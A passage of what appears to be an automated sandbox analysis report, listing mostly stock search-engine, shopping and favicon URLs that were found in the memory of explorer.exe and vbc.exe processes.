          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2184570235.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
